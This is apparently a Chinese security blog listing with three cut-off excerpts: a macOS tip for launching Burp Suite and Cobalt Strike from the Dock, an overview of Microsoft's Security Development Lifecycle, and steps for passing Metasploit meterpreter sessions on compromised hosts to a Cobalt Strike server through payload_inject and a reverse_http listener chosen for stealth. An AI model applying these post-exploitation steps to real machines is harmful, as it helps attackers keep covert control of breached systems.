MAC下,把java程序放入Dock方法

1.打开automator.app 2.选择应用程序 3.在左边栏找到“运行shell脚本” 4.输入 java -Xmx1024m -jar $(ls -t /opt/burp/burpsuite_pro_*.jar | head -1) 5.command +s 保存,输入应用名称 6.在应用程序里修改一下应用图标 7.在dashboard面板,把应用拖入Dock。 8.Done 注:可以把burp,cknife,cobaltstrike,等等拖进来,但是运行是的那个82年小咖啡杯子是一直存在的。

查看全部


安全开发流程(SDL)

SDL的全称是Security Development Lifecycle,即:安全开发生命周期。它是由微软最早提出的,在软件工程中实施,是帮助解决软件安全问题的办法。SDL是一个安全保证的过程,起重点是软件开发,它在开发的所有阶段都引入了安全和隐私的原则。自2004年起,SDL一直都是微软在全公司实施的强制性策略。 SDL中的方法,试图从安全漏洞产生的根源上解决问题,通过对软件工程的控制,保证产品的安全性。 SDL的步骤包括: 阶段1:培训 开发团队的所有成员都必须接受适当的安全培训,了解相关的安全知识,培训对象包括开发人员、测试人员、项目经理、产品经理等。 阶段2:安全要求 在项目确立之前,需要提前与项目经理或者产品owner进行沟通,确定安全的要求和需要做的事情。确认项目计划和里程碑,尽量避免因为安全问题而导致项目延期发布。 阶段3:质量门/bug栏 阶段4:安全和隐私风险评估 安全 […]

查看全部


把MSF shell派生给Cobaltstrike3.6过程

原因:MSF带着走哪都比较繁重,无法集群工作,然鹅,解决这个问题的时候,发现msf上已经有meterpreter几十个,想要转走到集群的Cobaltstike上,只需要以下几步即可完成,Cobaltstrike 3.0+以后的集群是否方便,谁用谁知道。 1.登陆集群的Cobaltstirke,然后设置个beacon_http的监听。(至于为什么这个方式监听,隐蔽,要不然你监听后,到肉鸡上执行netstat -ano 看看) 2.进入有多个 meterpreter sessions的msf执行: use exploit/windows/local/payload_inject                    启用攻击模块中windows分类下local分类的payload_inject 攻击器// set PAYLOAD windows/meterpreter/reverse_http […]

查看全部